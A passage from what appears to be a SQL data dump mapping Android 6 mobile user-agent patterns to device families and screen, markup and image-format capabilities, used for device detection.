Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VPA051) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VR BOT 552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VR One) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VS500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VS500PP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VS985 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VS986) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VS990) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Venus_V3_5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Venus_V3_5040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Venus_V3_5070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Venus_V3_5570) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Venus_V3_5580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vestel_5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vestel_5000_2gb) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vestel_5000_Dual) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vestel_5530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Victor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VisionBook P50 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VisionBook P55 LTE Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vivax Fun S501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vivax Point X551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vivo 5 Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vivo 5R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vivo 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vmobile J7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Vodafone Smart ultra 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Volt_X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; W45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; W50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; W55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; WIAM #24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Wileyfox Spark +) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Wileyfox Spark X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Wileyfox Spark) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Wileyfox Storm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Wink_City_S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Wink_Share_SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X-Force(TM-5009)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X-TIGI_A10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X-TIGI_V10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X-TIGI_V11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X-TIGI_V3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X-tremePQ35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X-treme_PQ17) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X-treme_PQ31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X21 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X3_Soul_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X3_Soul_PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X4_Soul) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X5 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X5max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X5max_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X5pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X6 S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X6pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X7pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X9 Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X900+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; X9pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1063) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1064) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1068) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1069) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1072) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1078) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1079) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1092) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1095) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1097) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1225) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1254) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1562) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1563) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1565) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1572) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1585) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1609) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 